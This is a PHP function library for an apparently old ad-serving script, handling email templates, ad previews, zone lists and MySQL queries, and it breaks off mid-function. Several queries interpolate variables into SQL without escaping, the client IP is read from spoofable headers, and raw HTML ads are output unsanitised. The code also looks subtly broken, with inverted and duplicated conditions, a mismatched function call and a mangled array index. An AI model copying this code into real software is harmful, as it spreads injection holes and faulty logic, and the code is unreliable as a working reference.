<?php
function get_ip( )
{
    if ( getenv( "HTTP_CLIENT_IP" ) )
    {
        $ip = getenv( "HTTP_CLIENT_IP" );
        return $ip;
    }
    if ( getenv( "HTTP_X_FORWARDED_FOR" ) )
    {
        $ip = getenv( "HTTP_X_FORWARDED_FOR" );
        return $ip;
    }
    if ( getenv( "REMOTE_ADDR" ) )
    {
        $ip = getenv( "REMOTE_ADDR" );
        return $ip;
    }
    if ( $_SERVER[REMOTE_ADDR] )
    {
        $ip = $_SERVER[REMOTE_ADDR];
        return $ip;
    }
    $ip = "UNKNOWN";
    return $ip;
}

function replace_once_html( $x )
{
    if ( $x )
    {

    $x = stripslashes( $x );
    return ereg_replace( "&amp;", "&", ereg_replace( "[\\]", "&#92;", ereg_replace( "'", "&#039;", $x ) ) );
    }
}

function unreplace_ad_preview( $x )
{
    if ( $x )
    {


    $x = ereg_replace( "''", "", ereg_replace( "[\\]", "", $x ) );
    return str_replace( "&amp;", "&", str_replace( "&#039;", "'", str_replace( "&#92;", "\\", $x ) ) );
    }
}

function unreplace_once_html( $x )
{
    if ( $x )
    {

    $x = ereg_replace( "''", "", ereg_replace( "[\\]", "", $x ) );
    return ereg_replace( "&#039;", "", ereg_replace( "--BACKSLASH--", "\\\\", ereg_replace( "&#92;", "\\", $x ) ) );
    }
}

function replace_once_text( $x )
{
    if ( $x )
    {

    $x = stripslashes( $x );
    $x = ereg_replace( "''", "", ereg_replace( "[\\]'", "'", ereg_replace( "[\\]\"", "\"", $x ) ) );
    return ereg_replace( "&amp;", "&", ereg_replace( "[\\]", "&#92;", htmlspecialchars( $x, ENT_QUOTES ) ) );
    }
}

function replace_array_text( $x )
{
    if ( $x )
    {

    foreach ( $x as $k => $v )
    {
        if ( is_array( $v ) )
        {
            $v = stripslashes( $v );
            $x[$k] = ereg_replace( "&amp;", "&", ereg_replace( "[\\]", "&#92;", htmlspecialchars( $v, ENT_QUOTES ) ) );
        }
    }
    return $x;
    }
}

function replace_array_ad_show( $ad )
{
    global $s;
    foreach ( $ad as $k => $v )
    {
        if ( is_array( $v ) )
        {
            $v = stripslashes( $v );
            $ad[$k] = ereg_replace( "[\\]", "", str_replace( "'", "&amp;#039;", $v ) );
        }
    }
    if ( $s[all_ad_types][$ad[ad_type]][ad_type] == "fpad" )
    {
        $ad[text2] = str_replace( "&amp;#039;", "\\'", $ad[text2] );
    }
    return $ad;
}

function mail_from_template( $t, $vl )
{
    global $s;
    $t = template_select( $t, 1 );
    if ( !is_array( $vl ) )
    {
        $vl = array( );
    }
    $vl = array_merge( $vl, get_common_variables( ) );
    $vl[site_url] = $s[site_url];
    if ( !( $fd = fopen( $t, "r" ) ) )
    {
        problem( "Cannot read template ".$t );
    }
    while ( $line = fgets( $fd, 4096 ) )
    {
        $emailtext .= $line;
    }
    fclose( $fd );
    eregi( "Subject: +([^\n\r]+)", $emailtext, $regs );
    $sub = $regs[1];
    $emailtext = eregi_replace( "Subject: +([^\n\r]+)[\r\n]+", "", $emailtext );
    reset( $vl );
    while ( list( $k, $v ) = each( $vl ) )
    {
        $emailtext = str_replace( "#%".$k."%#", $v, $emailtext );
    }
    $emailtext = eregi_replace( "#%[a-z0-9_]*%#", "", $emailtext );
    $emailtext = unreplace_once_html( $emailtext );
    $sub = unreplace_once_html( $sub );
    if ( $vl[htmlmail] || $s[htmlmail] )
    {
        $htmlhead = mail_html_head( );
    }
    else
    {
        $emailtext = unhtmlentities( $emailtext );
        $sub = unhtmlentities( $sub );
    }
    if ( !$vl[to] )
    {
        $vl[to] = $s[adminemail];
    }
    if ( $s[adminemail1] && $vl[to] == $s[adminemail] )
    {
        mail( $s[adminemail1], $sub, $emailtext, "From: ".$s['sitename']."<{$s['adminemail']}>" );
    }
    mail( $vl[to], $sub, $emailtext, "From: ".$s['adminemail'] );
}

function mail_head( $html )
{
    global $s;
    if ( $html )
    {
        return "\nMime-Version: 1.0\nContent-Type: text/html; charset=".$s['charset']."\nContent-Transfer-Encoding: 8bit";
    }
    return "\nContent-Type: text/plain; charset=".$s['charset'];
}

function unhtmlentities( $string )
{
    $string = eregi_replace( "'", "'", $string );
    $trans_tbl = get_html_translation_table( HTML_ENTITIES );
    $trans_tbl = array_flip( $trans_tbl );
    return strtr( $string, $trans_tbl );
}

function parse_part( $t, $vl, $email )
{
    global $s;
    global $m;
    if ( !is_array( $vl ) )
    {
        $vl = array( );
    }
    $vl = array_merge( $vl, get_common_variables( ) );
    $t = template_select( $t, $email );
    if ( !is_array( $vl ) )
    {
        $vl = array( );
    }
    $vl[adminemail] = $s[adminemail];
    $vl[currency] = $s[currency];
    if ( !( $fh = fopen( $t, "r" ) ) )
    {
        problem( $m['erroropentmpl']." {$t}" );
    }
    while ( !feof( $fh ) )
    {
        $line .= fgets( $fh, 4096 );
    }
    fclose( $fh );
    foreach ( $vl as $k => $v )
    {
        $line = str_replace( "#%".$k."%#", $v, $line );
    }
    return eregi_replace( "#%[a-z0-9_]*%#", "", $line );
}

function template_select( $t, $email, $style )
{
    global $s;
    if ( $email )
    {
        $folder = "email_templates";
    }
    else
    {
        $folder = "templates";
    }
    if ( file_exists( $s['phppath']."/styles/{$style}/{$folder}/{$t}" ) )
    {
        return $s['phppath']."/styles/{$style}/{$folder}/{$t}";
    }
    if ( !file_exists( $s['phppath']."/styles/_common/{$folder}/{$t}" ) )
    {
        exit( "Unable to read template ".$t );
    }
    return $s['phppath']."/styles/_common/{$folder}/{$t}";
}

function show_current_preview( $ad_vars )
{
    global $s;
    global $m;
    //print_r($ad_vars[preview]);
    if ( !$m[na] )
    {
        $m[ad_incomplete] = $m[ad_incomplete];
    }
    if ( !$m[click_to_open] )
    {
        $m[click_to_open] = "Click to open";
    }
    $ad_type = $s[all_ad_types][$ad_vars[ad_type]][ad_type];
    if ( $ad_vars[preview] )
    {
        if ( $ad_type == "banner" )
        {
            $preview = "<iframe width=\"".$s[all_ad_types][$ad_vars[ad_type]][w]."\" height=\"".$s[all_ad_types][$ad_vars[ad_type]][h]."\" src=\"".$s[site_url]."/preview.php?action=show_preview_in_iframe_banner&n=".$ad_vars[n]."\" scrolling=\"no\" frameborder=\"0\"></iframe>";
        }
        else if ( $ad_type == "google" )
        {
            $preview = unreplace_ad_preview( $ad_vars[preview] );
        }
        else if ( $ad_type == "dhtml" )
        {
            $preview = "<iframe width=\"".$s[all_ad_types][$ad_vars[ad_type]][w]."\" height=\"".$s[all_ad_types][$ad_vars[ad_type]][h]."\" src=\"".$s[site_url]."/preview.php?action=show_preview_in_iframe&n=".$ad_vars[n]."\" scrolling=\"no\" frameborder=\"0\"></iframe>";
        }
        else if ( $ad_type == "page" && $ad_vars[url1] )
        {
            $preview = "<a href=\"#\" onclick=\"preview_window('".$s[site_url]."/preview.php?action=show_preview_page&n=".$ad_vars[n]."')\">".$m[click_to_open]."</a>";
        }
        else if ( $ad_type == "fpad" && $ad_vars[url1] && $ad_vars[text1] && $ad_vars[text2] )
        {
            $preview = "<iframe width=\"600\" height=\"400\" src=\"".$s[site_url]."/preview.php?action=show_preview_in_iframe_fpad&n=".$ad_vars[n]."\" scrolling=\"yes\" frameborder=\"0\"></iframe>";
        }
    }
    if ( !$preview )
    {
        $preview = $m[ad_incomplete];
    }
    return $preview;
}

function day_n( $x )
{
    global $s;
    if ( !$x )
    {
        $x = $s[cas];
    }
    return date( "j", $x );
}

function month_n( $x )
{
    global $s;
    if ( !$x )
    {
        $x = $s[cas];
    }
    return date( "n", $x );
}

function year_n( $x )
{
    global $s;
    if ( !$x )
    {
        $x = $s[cas];
    }
    return date( "Y", $x );
}

function days_in_month( $month, $year )
{
    return date( "t", mktime( 0, 0, 0, $month, 15, $year ) );
}

function select_days( $a )
{
    global $s;
    if ( !$a )
    {
        $a = date( "j", $s[cas] );
    }

    for ( $x = 1; $x <= 31; ++$x )
    {
        if ( $x == $a )
        {
            $y = " selected";
        }
        else
        {
            $y = "";
        }
        $b .= "<option value=\"".$x."\"".$y.">".$x."</option>";
    }
    return $b;
}

function select_months( $a )
{
    global $s;
    if ( !$a )
    {
        $a = date( "n", $s[cas] );
    }

    for ( $x = 1; $x <= 12; ++$x )
    {
        if ( $x == $a )
        {
            $y = " selected";
        }
        else
        {
            $y = "";
        }
        $b .= "<option value=\"".$x."\"".$y.">".$x."</option>";
    }
    return $b;
}

function select_years( $a )
{
    global $s;
    if ( !$a )
    {
        $a = date( "Y", $s[cas] );
    }

    for ( $x = 2006; $x <= 2020; ++$x )
    {
        if ( $x == $a )
        {
            $y = " selected";
        }
        else
        {
            $y = "";
        }
        $b .= "<option value=\"".$x."\"".$y.">".$x."</option>";
    }
    return $b;
}

function select_years_past( $a )
{
    global $s;
    if ( !$a )
    {
        $a = date( "Y", $s[cas] );
    }

    for ( $x = 2000; $x <= date( "Y", $s[cas] ); ++$x )
    {
        if ( $x == $a )
        {
            $y = " selected";
        }
        else
        {
            $y = "";
        }
        $b .= "<option value=\"".$x."\"".$y.">".$x."</option>";
    }
    return $b;
}

function campaign_is_active( $i, $c, $valid_by, $unlimit, $en_u, $en_w, $accept, $t1, $t2, $ad )
{
    global $s;
    if ( ( $i || $c || $s[cas] < $valid_by || $unlimit ) && $en_u && $en_w && $accept && $t1 < $s[cas] && $s[cas] < $t2 && $ad )
    {
        return 1;
    }
    return 0;
}

function get_all_countries( )
{
    global $s;
    $q = dq( "select flag,name,code from ".$s['pr']."countries", 1 );
    while ( $x = mysql_fetch_assoc( $q ) )
    {
        $s[countries][$x[code]] = $x;
    }
}

function get_all_zones_array( $a_allow, $p_allow )
{
    global $s;
    if ( $a_allow )
    {
        $x = "where a_allow = '1'";
    }
    if ( $p_allow )
    {
        $x = "where p_allow = '1'";
    }
    $q = dq( "select n,title from ".$s['pr']."zones {$x}", 1 );
    while ( $x = mysql_fetch_row( $q ) )
    {
        $a[$x[0]] = $x[1];
    }
    return $a;
}

function get_adv_package_variables( $n )
{
    global $s;
    $q = dq( "select * from ".$s['pr']."adv_packs where n = '{$n}'", 1 );
    return mysql_fetch_assoc( $q );
}

function get_zone_variables( $n )
{
    global $s;
    $q = dq( "select * from ".$s['pr']."zones where n = '{$n}'", 1 );
    return mysql_fetch_assoc( $q );
}

function get_user_variables( $who, $n )
{
    global $s;
    if ( $who == "a" )
    {
        $table = $s['pr']."a_users";
    }
    else
    {
        $table = $s['pr']."p_users";
    }
    $q = dq( "select * from ".$table." where n = '{$n}'", 1 );
    return mysql_fetch_assoc( $q );
}

function get_ad_variables( $n, $owner )
{
    global $s;
    global $m;
    if ( $owner )
    {
        $x = "and user = '".$owner."'";
    }
    $q = dq( "select * from ".$s['pr']."ads where n = '{$n}' {$x}", 1 );
    if ( $owner && !mysql_num_rows( $q ) )
    {
        problem( $m[ad_no_find] );
    }
    //print_r(mysql_fetch_assoc( $q ));
    return mysql_fetch_assoc( $q );
}

function get_campaign_variables( $ad, $camp )
{
    global $s;
    $q = dq( "select * from ".$s['pr']."c where n = '{$ad}' and camp = '{$camp}'", 1 );
    return mysql_fetch_assoc( $q );
}

function get_ad_type_google_dhtml_variables( $n )
{
    global $s;
    $q = dq( "select * from ".$s['pr']."ad_type_google_dhtml where n = '{$n}'", 1 );
    return mysql_fetch_assoc( $q );
}

function get_order_variables( $n )
{
    global $s;
    $q = dq( "select * from ".$s['pr']."a_orders where n = '{$n}'", 1 );
    return mysql_fetch_assoc( $q );
}

function recount_orders_for_advertiser( $n )
{
    global $s;
    $q = dq( "select count(*) from ".$s['pr']."a_orders where user = '{$n}'", 1 );
    $orders = mysql_fetch_row( $q );
    $q = dq( "select count(*) from ".$s['pr']."a_orders where user = '{$n}' and paid = '1'", 1 );
    $paid = mysql_fetch_row( $q );
    $q = dq( "select order_time from ".$s['pr']."a_orders where user = '{$n}' order by order_time desc", 1 );
    $last = mysql_fetch_row( $q );
    dq( "update ".$s['pr']."a_users set orders = '{$orders['0']}', paid_ord = '{$paid['0']}', last_ord = '{$last['0']}' where n = '{$n}'", 1 );
}

function get_package_variables( $n )
{
    global $s;
    $q = dq( "select * from ".$s['pr']."adv_packs where n = '{$n}'", 1 );
    return mysql_fetch_assoc( $q );
}

function get_all_ad_types( )
{
    global $s;
    $q = dq( "select * from ".$s['pr']."ad_types order by title", 1 );
    while ( $x = mysql_fetch_assoc( $q ) )
    {
        $s[all_ad_types][$x[n]] = $x;
    }
}

function get_pub_place_variables( $n, $owner )
{
    global $s;
    global $m;
    if ( $owner )
    {
        $x = "and owner = '".$owner."'";
    }
    $q = dq( "select * from ".$s['pr']."p_pl where n = '{$n}' {$x}", 1 );
    if ( $owner && !mysql_num_rows( $q ) )
    {
        exit( );
    }
    return mysql_fetch_assoc( $q );
}

function zones_select_list( $zone, $ad_vars, $a_allow, $p_allow )
{
    global $s;
    global $m;
    if ( $ad_vars[ad_type] )
    {
        $where = " AND ".$s['pr']."zones.ad_type = '{$ad_vars['ad_type']}'";
    }
    if ( $a_allow )
    {
        $where .= "and ((a_price_c > 0 and a_amount_c > 0) OR (a_price_i > 0 and a_amount_i > 0) OR (a_price_d > 0 and a_amount_d > 0))";
    }
    else if ( $p_allow )
    {
        $where .= "and ((p_price_c > 0 and p_amount_c > 0) OR (p_price_i > 0 and p_amount_i > 0))";
    }
    if ( $ad_vars[def] )
    {
        if ( $zone == "a" )
        {
            $selected = " selected";
        }
        $a = "<option value=\"a\"".$selected.">All</option>";
    }
    $q = dq( "select ".$s['pr']."zones.* from {$s['pr']}zones,{$s['pr']}ad_types where {$s['pr']}zones.ad_type = {$s['pr']}ad_types.n {$where} order by {$s['pr']}ad_types.title,{$s['pr']}zones.title", 1 );
    while ( $data = mysql_fetch_assoc( $q ) )
    {
        if ( $p_allow && !$data[p_pay_for_both] || 0 < $data[p_price_i] && 0 < $data[p_price_c] && $data[p_amount_i] && $data[p_amount_c] )
        {
            if ( $data[n] == $zone && $ad_vars[pay_for] == "i" )
            {
                $selected = " selected";
            }
            else
            {
                $selected = "";
            }
            if ( $data[p_price_i] && $data[p_price_i] )
            {
                $a .= "<option value=\"".$data[n]."-i\"".$selected.">".$data[title]." - ".$m[Commission]." ".$s[currency].$data[p_price_i]." for ".$data[p_amount_i]." ".$m[impressions]."</option>";
            }
            if ( $data[n] == $zone && $ad_vars[pay_for] == "c" )
            {
                $selected = " selected";
            }
            else
            {
                $selected = "";
            }
            if ( !$data[p_price_c] && !$data[p_price_c] )
            {
                $a .= "<option value=\"".$data[n]."-c\"".$selected.">".$data[title]." - ".$m[Commission]." ".$s[currency].$data[p_price_c]." for ".$data[p_amount_c]." ".$m[clicks]."</option>";
            }
        }
        else
        {
            if ( $data[n] == $zone || in_array( $data[n], $zone ) )
            {
                $selected = " selected";
            }
            else
            {
                $selected = "";
            }
            $a .= "<option value=\"".$data[n]."\"".$selected.">".$data[title]."</option>";
        }
    }
    return $a;
}

function ad_types_selected( $ad_type, $a_allow, $p_allow )
{
    global $s;
    if ( $a_allow )
    {
        $q = dq( "select ad_type from ".$s['pr']."zones where (a_price_i>0 and a_amount_i>0) OR (a_price_c>0 and a_amount_c>0) OR (a_price_d>0 and a_amount_d>0) group by ad_type", 1 );
        while ( $x = mysql_fetch_assoc( $q ) )
        {
            $ad_types[] = $x[ad_type];
         }
        if ( !$ad_types )
        {
            return false;
        }
        $query = "where ".my_implode( "n", "OR", $ad_types );
    }
    else if ( $p_allow )
    {
        $q = dq( "select ad_type from ".$s['pr']."zones where (p_price_i>0 and p_amount_i>0) OR (p_price_c>0 and p_amount_c>0) group by ad_type", 1 );
        while ( $x = mysql_fetch_assoc( $q ) )
        {
            $ad_types[] = $x[ad_type];
        }
        if ( !$ad_types )
        {
            return false;
        }
        $query = "where ".my_implode( "n", "OR", $ad_types );
    }
    $q = dq( "select * from ".$s['pr']."ad_types {$query} order by title", 1 );
    while ( $data = mysql_fetch_assoc( $q ) )
    {
        if ( $data[n] == $ad_type )
        {
            $x = " selected";
        }
        else
        {
            $x = "";
        }
        $a .= "<option value=\"".$data[n]."\"".$x.">".$data[title]."</option>";
    }
    return $a;
}

function my_implode( $item, $bool, $array )
{
    return "(".$item." = '".implode( "' ".$bool." ".$item." = '", $array )."')";
}

function google_ad_preview( $ad_type_google_dhtml_vars, $ad_vars )
{
    global $s;
    global $m;
    if ( is_array( $ad_vars ) )
    {
        if ( $ad_vars[ad_kind] == "raw_html" )
        {
            if ( !trim( $ad_vars[raw] ) )
            {
                return "";
            }
            preg_match_all( "(href=\"http://[a-z0-9./_|+=%?&\\-]+)", $ad_vars[raw], $x );
            foreach ( $x[0] as $k => $v )
            {
                $ad_vars[raw] = str_replace( $v, "href=\"".$s['site_url']."/link.php?size={$ad_type_google_dhtml_vars['n']}&to={$ad_vars['user']}&b={$ad_vars['ad_no']}&url=".urlencode( ereg_replace( "&amp;", "&", str_replace( "href=\"", "", $v ) ) ), $ad_vars[raw] );
            }
            return $ad_vars[raw];
        }

        for ( $x = 1; $x <= 10; ++$x )
        {
            if ( trim( $ad_vars["text".$x] ) )
            {
                $vl["text".$x] = $ad_vars["text".$x];
            }
            else if ( $ad_type_google_dhtml_vars["label".$x] )
            {
                $missing_vl = 1;
            }
        }

        for ( $x = 1; $x <= 3; ++$x )
        {
            if ( trim( $ad_vars["url".$x] ) || !$ad_type_google_dhtml_vars["url".$x] || !( $x == 1 ) )
            {
                $missing_vl = 1;
            }
        }
        if ( $missing_vl )
        {
            return "";
        }
    }
    else
    {

        for ( $x = 1; $x <= 10; ++$x )
        {
            $vl["text".$x] = $ad_type_google_dhtml_vars["label".$x];
        }
    }
    foreach ( $ad_vars as $k => $v )
    {
        $vl[$k] = $v;
    }
    $color_style_vars = get_color_style_variables( $s[all_ad_types][$ad_type_google_dhtml_vars[n]][color_style] );
    foreach ( $color_style_vars as $k => $v )
    {
        $vl[$k] = $v;
    }
    $vl[c_background] = $color_style_vars[background];
    $vl[c_border] = $color_style_vars[border];
    $vl[c_logo_text] = get_logotext_color( $color_style_vars[border], $s[all_ad_types][$ad_type_google_dhtml_vars[n]][logotext_color] );
    $vl[site_title] = $s[site_title];
    $vl[site_url] = $s[site_url];
    foreach ( $vl as $k => $v )
    {
        $ad_type_google_dhtml_vars[template_preview] = str_replace( "#%".$k."%#", $v, $ad_type_google_dhtml_vars[template_preview] );
    }
    return unreplace_once_html( $ad_type_google_dhtml_vars[template_preview] );
}

function ad_preview( $ad_type_vars, $ad_type_google_dhtml_vars, $ad_vars )
{
    global $s;
    global $m;
    $s[ad_complete] = 1;
    if ( is_numeric( $ad_type_vars ) )
    {
        $ad_type_vars = $s[all_ad_types][$ad_type_vars];
    }
    if ( is_numeric( $ad_type_google_dhtml_vars ) )
    {
        $ad_type_google_dhtml_vars = get_ad_type_google_dhtml_variables( $ad_type_google_dhtml_vars );
    }
    if ( $ad_vars && is_numeric( $ad_vars ) )
    {
        $ad_vars = get_ad_variables( $ad_vars );
    }
    $ad_vars = replace_array_ad_show( $ad_vars );
    if ( $ad_type_vars[ad_type] == "banner" )
    {
        if ( !$ad_vars[default_banner] )
        {
            $ad_vars[default_banner] = 0;
        }
        if ( $ad_vars[kind] == "raw" )
        {
            $ad_vars[raw] = str_replace( "hrefNC", "href", str_replace( "httpNC", "http", $ad_vars[raw] ) );
            $html = $ad_vars[raw];
        }
        else if ( eregi( ".*swf\$", $ad_vars[banner] ) )
        {
            $ad_vars[click_tag] = $s[site_url].urlencode( $ad_vars['url']."" )."&window=_blank";
            $ad_vars[w] = $ad_type_vars[w];
            $ad_vars[h] = $ad_type_vars[h];
            $html = $s[flash_code];
            foreach ( $ad_vars as $k => $v )
            {
                $html = str_replace( "#%".$k."%#", $v, $html );
            }
            $html = eregi_replace( "#%[a-z0-9_]*%#", "", $html );
        }
        else if ( $ad_vars[banner] && $ad_vars[url] )
        {
            $html = "<a target=\"_blank\" href=\"".$ad_vars[url]."\"><img alt=\"".$ad_vars[alt]."\" border=0 src=\"".$ad_vars[banner]."\" width=\"".$ad_type_vars[w]."\" height=\"".$ad_type_vars[h]."\"></a>";
        }
        if ( !$html )
        {
            $s[ad_complete] = 0;
        }
        return $html;
    }
    if ( $ad_type_vars[ad_type] == "page" )
    {
        $vl[w] = $ad_type_vars[w];
        $vl[h] = $ad_type_vars[h];
        $vl[url] = $vl[click_url] = $ad_vars[url1];
        $vl[site_title] = $s[site_title];
        $vl[ad_type_title] = "page".$ad_type_vars['n'."{$ad_vars['n']}"];
        $vl[site_url] = $s[site_url];
        $vl[text1] = $ad_vars[text1];
        if ( $ad_vars[url1] )
        {
        }
        if ( !$ad_vars[text1] )
        {
            $s[ad_complete] = 0;
        }
        foreach ( $vl as $k => $v )
        {
            $ad_type_google_dhtml_vars[template] = str_replace( "#%".$k."%#", $v, $ad_type_google_dhtml_vars[template] );
        }
        return $ad_type_google_dhtml_vars[template];
    }
    if ( $ad_type_vars[ad_type] == "fpad" )
    {
        $vl[continue_url] = $ad_vars[url1];
        $vl[title] = $ad_vars[text1];
        $vl[ad] = $ad_vars[text2];
        $vl[site_url] = $s[site_url];
        if ( $ad_vars[url1] )
        {
            if ( $ad_vars[text1] )
            {
            }
        }
        if ( !$ad_vars[text2] )
        {
            $s[ad_complete] = 0;
        }
        $vl[continue_title] = $s[site_title];
        $vl[adsite_url] = $s[continue_url];
        foreach ( $vl as $k => $v )
        {
            $ad_type_google_dhtml_vars[template] = str_replace( "#%".$k."%#", $v, $ad_type_google_dhtml_vars[template] );
        }
        return str_replace( "onLoad", "onXLoad", $ad_type_google_dhtml_vars[template] );
    }
    if ( $ad_type_vars[ad_type] == "dhtml" )
    {
        $vl = $ad_vars;

        for ( $x = 1; $x <= 10; ++$x )
        {
            if ( trim( $ad_vars["text".$x] ) )
            {
                $vl["text".$x] = $ad_vars["text".$x];
            }
            else if ( $ad_type_google_dhtml_vars["label".$x] )
            {
                $s[ad_complete] = 0;
            }
        }

        for ( $x = 1; $x <= 3; ++$x )
        {
            if ( trim( $ad_vars["url".$x] ) || !$ad_type_google_dhtml_vars["url".$x] || !( $x == 1 ) )
            {
                $s[ad_complete] = 0;
            }
        }

        for ( $x = 1; $x <= 5; ++$x )
        {
            if ( trim( $ad_vars["picture".$x] ) || !$ad_type_google_dhtml_vars["picture".$x] )
            {
                $s[ad_complete] = 0;
            }
        }
        if ( !$s[ad_complete] )
        {

            for ( $x = 1; $x <= 10; ++$x )
            {
                if ( !$vl["text".$x] )
                {
                    $vl["text".$x] = $ad_type_google_dhtml_vars["label".$x];
                }
            }

            for ( $x = 1; $x <= 5; ++$x )
            {
                if ( !trim( $vl["picture".$x] ) )
                {
                    $vl["picture".$x] = $s['site_url']."/images/previews/{$ad_type_vars['n']}-{$x}.gif";
                }
            }
        }
        $vl[site_url] = $s[site_url];
        foreach ( $vl as $k => $v )
        {
            $ad_type_google_dhtml_vars[template] = str_replace( "#%".$k."%#", $v, $ad_type_google_dhtml_vars[template] );
        }
        return $ad_type_google_dhtml_vars[template];
    }
    if ( $ad_type_vars[ad_type] == "google" )
    {
        for ( $x = 1; $x <= 10; ++$x )
        {
            $vl["text".$x] = htmlspecialchars( $ad_type_google_dhtml_vars["label".$x] );
        }
        if ( is_array( $ad_vars ) )
        {

            for ( $x = 1; $x <= 10; ++$x )
            {
                if ( trim( $ad_vars["text".$x] ) )
                {
                    $vl["text".$x] = replace_once_text( $ad_vars["text".$x] );
                }
                else if ( $ad_type_google_dhtml_vars["label".$x] )
                {
                    $s[ad_complete] = 0;
                }
            }

            for ( $x = 1; $x <= 3; ++$x )
            {
                $vl["url".$x] = $ad_vars["url".$x];
            //echo '<pre> ad type: '; print_r($ad_type_google_dhtml_vars["url".$x]); echo '</pre>';
                if ( trim( $ad_vars["url".$x] ) && !$ad_type_google_dhtml_vars["url".$x] )
                {
                    $s[ad_complete] = 0;
                }
            }
        }
        $color_style_vars = get_color_style_variables( $ad_type_vars[color_style] );
        foreach ( $color_style_vars as $k => $v )
        {
            $vl[$k] = $v;
        }
        $vl[c_background] = $color_style_vars[background];
        $vl[c_border] = $color_style_vars[border];
        $vl[c_logo_text] = get_logotext_color( $color_style_vars[border], $s[all_ad_types][$ad_type_google_dhtml_vars[n]][logotext_color] );
        $vl[site_title] = $s[site_title];
        $vl[site_url] = $s[site_url];
        foreach ( $vl as $k => $v )
        {
            $ad_type_google_dhtml_vars[template_preview] = str_replace( "#%".$k."%#", $v, $ad_type_google_dhtml_vars[template_preview] );
        }
        $ad_type_google_dhtml_vars[template_preview] = eregi_replace( "#%[a-z0-9_]*%#", "", $ad_type_google_dhtml_vars[template_preview] );
        return $ad_type_google_dhtml_vars[template_preview];
    }
}

function get_color_style_variables( $n )
{
    global $s;
    if ( !$n )
    {
        $n = $s[color_style];
    }
    $q = dq( "select * from ".$s['pr']."ads_colors where n = '{$n}' limit 1", 1 );
    if ( !mysql_num_rows( $q ) )
    {
        $q = dq( "select * from ".$s['pr']."ads_colors order by n limit 1", 1 );
    }
    return mysql_fetch_assoc( $q );
}

function get_logotext_color( $color, $logo_text )
{
    global $s;
    if ( $logo_text == "contrast" )
    {
        $color = getcontrastcolor( $color );
        return $color;
    }
    $color = negativecolor( $color );
    return $color;
}

function getcontrastcolor( $color )
{
    if ( 8.38861e+006 < hexdec( $color ) )
    {
        return "000000";
    }
    return "ffffff";
}

function negativecolor( $color )
{
    $red = substr( $color, 0, 2 );
    $green = substr( $color, 2, 2 );
    $blue = substr( $color, 4, 2 );
    $red = 255 - hexdec( $red );
    $green = 255 - hexdec( $green );
    $blue = 255 - hexdec( $blue );
    return dechex( $red ).dechex( $green ).dechex( $blue );
}

function ads_block_preview_google( $ad_type_google_dhtml_vars, $template_vars, $color_style )
{
    global $s;
    global $m;
    if ( is_numeric( $ad_type_google_dhtml_vars ) )
    {
        $ad_type_google_dhtml_vars = get_ad_type_google_dhtml_variables( $ad_type_google_dhtml_vars );
    }
    if ( is_numeric( $template_vars ) )
    {
        $template_vars = get_template_variables( $template_vars );
    }

    for ( $x = 1; $x <= $template_vars[ads]; ++$x )
    {
        $template_vars[template_big] = str_replace( "#%ad".$x."%#", $template_vars[template_small], $template_vars[template_big] );
    }

    for ( $x = 1; $x <= 10; ++$x )
    {
        $vl["text".$x] = $ad_type_google_dhtml_vars["label".$x];
    }
    $color_style_vars = get_color_style_variables( $color_style );
    foreach ( $color_style_vars as $k => $v )
    {
        $vl[$k] = $v;
    }
    $vl[c_background] = $color_style_vars[background];
    $vl[c_border] = $color_style_vars[border];
    $vl[c_logo_text] = get_logotext_color( $color_style_vars[border], $s[all_ad_types][$ad_type_google_dhtml_vars[n]][logotext_color] );
    $vl[site_title] = $s[site_title];
    $vl[site_url] = $s[site_url];
    foreach ( $vl as $k => $v )
    {
        $template_vars[template_big] = str_replace( "#%".$k."%#", $v, $template_vars[template_big] );
    }
    return unreplace_once_html( $template_vars[template_big] );
}

function ads_block_preview_banner( $ad_type_vars, $template_vars )
{
    global $s;
    global $m;
    if ( is_numeric( $ad_type_vars ) )
    {
        $ad_type_vars = $s[all_ad_types][$ad_type_vars];
    }
    if ( is_numeric( $template_vars ) )
    {
        $template_vars = get_template_variables( $template_vars );
    }
    $example_banner = "<img border=\"0\" src=\"".$s[site_url]."/images/previews/".$ad_type_vars[n]."-1.gif\" width=\"".$ad_type_vars[w]."\" height=\"".$ad_type_vars[h]."\">";

    for ( $x = 1; $x <= $template_vars[ads]; ++$x )
    {
        $template_vars[template_big] = str_replace( "#%ad".$x."%#", $example_banner, $template_vars[template_big] );
    }
    $vl[site_title] = $s[site_title];
    $vl[site_url] = $s[site_url];
    foreach ( $vl as $k => $v )
    {
        $template_vars[template_big] = str_replace( "#%".$k."%#", $v, $template_vars[template_big] );
    }
    return unreplace_once_html( $template_vars[template_big] );
}

function strip_replace_array( $form )
{
    if ( !$form )
    {
        return $form;
    }
    reset( $form );
    while ( list( $k, $v ) = each( $form ) )
    {
        if ( !is_array( $v ) )
        {
            $v = ereg_replace( "''", "'", $v );
            $form[$k] = ereg_replace( "[\\]", "", $v );
        }
    }
    return $form;
}

function strip_replace_once( $in )
{
    if ( is_array( $in ) )
    {
        return $in;
    }
    $in = ereg_replace( "''", "'", $in );
    $in = ereg_replace( "[\\]", "", $in );
    return $in;
}

function quotes_strip_once( $x )
{
    return str_replace( "'", "'", str_replace( "\"", "&quot;", stripslashes( $x ) ) );
}

function db_connect( )
{
    global $s;
    unset( $s->db_error );
    unset( $s->dben );
    if ( $s[nodbpass] )
    {
        $link_id = mysql_connect( $s[dbhost], $s[dbusername] );
    }
    else
    {
        $link_id = mysql_connect( $s[dbhost], $s[dbusername], $s[dbpassword] );
    }
    if ( !$link_id )
    {
        $s[db_error] = "Unable to connect to the host database host. Check database host, username, password.";
        $s[dben] = mysql_errno( );
        return 0;
    }
    if ( !$s[dbname] || !mysql_select_db( $s[dbname] ) )
    {
        $s[db_error] = mysql_errno( )." ".mysql_error( );
        $s[dben] = mysql_errno( );
        return 0;
    }
    if ( $s[dbname] && !mysql_select_db( $s[dbname] ) )
    {
        $s[db_error] = mysql_errno( )." ".mysql_error( );
        $s[dben] = mysql_errno( );
        return 0;
    }
    return $link_id;
}

function dq( $query, $check )
{
    global $s;
    $query = str_replace( "insert into", "insert ignore into", $query );
    $query = str_replace( "update ".$s['pr'], "update ignore ".$s['pr'], $query );
    $q = mysql_query( $query );
    if ( $check && !$q )
    {
        problem( mysql_error( ) );
    }
    return $q;
}

function datum( $cas, $plustime )
{
    global $s;
    if ( is_array( $cas ) )
    {
        $cas = mktime( 6, 0, 0, $cas[date_m], $cas[date_d], $cas[date_y] );
    }
    else if ( !$cas )
    {
        $cas = $s[cas];
    }

    for ( $y = 1; $y <= 3; ++$y )
    {
        if ( $s["date_form_".$y."a"] == "Space" )
        {
            $date_separator[$y] = " ";
        }
